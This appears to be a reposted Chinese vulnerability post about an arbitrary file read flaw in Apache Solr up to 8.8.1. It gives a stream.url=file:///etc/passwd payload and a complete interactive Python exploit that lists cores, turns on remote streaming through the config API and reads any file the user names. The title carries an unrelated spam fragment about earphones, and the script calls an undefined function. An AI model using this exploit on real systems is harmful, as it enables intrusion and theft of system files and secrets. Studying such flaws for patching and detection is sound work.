J_Dream | Apache Solr

网友投稿 432 2022-09-30


J_Dream | Apache Solr <=8.8.1 任意读取文件漏洞(jdream蓝牙耳机怎么连接手机)

1、介绍

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过Get操作提出查找请求,并得到XML格式的返回结果。

2、漏洞影响

3.漏洞复现

payload:POST: stream.url=file:///etc/passwd

Python POC:

import requests import sys import random import re import base64 import time from lxml import etree import json from requests.packages.urllib3.exceptions import InsecureRequestWarning def POC_1(target_url): core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json" try: response = requests.request("GET", url=core_url, timeout=10) core_name = list(json.loads(response.text)["status"])[0] print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m") return core_name except: print("\033[31m[x] 目标Url漏洞利用失败\033[0m") # sys.exit(0) def POC_2(target_url, core_name): vuln_url = target_url + "/solr/" + core_name + "/config" headers = { "Content-type":"application/json" } data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url)) if "This" in response.text and response.status_code == 200: print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url)) else: print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url)) sys.exit(0) except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) def POC_3(target_url, core_name, File_name): vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name) headers = { "Content-Type": "application/x-www-form-urlencoded" } data = 'stream.url=file://{}'.format(File_name) try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) if "No such file or directory" in response.text: print("\033[31m[x] 读取{}失败 \033[0m".format(File_name)) else: print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"])) except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) core_name = POC_1(target_url) POC_2(target_url, core_name) while True: File_name = str(input("\033[35mFile >>> \033[0m")) POC_3(target_url, core_name, File_name)


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

标签:接口 文件
上一篇:防火墙基础之防火墙在校园网中的应用(校园网 防火墙)
下一篇:详细介绍Java函数式接口
相关文章

 发表评论

暂时没有评论,来抢沙发吧~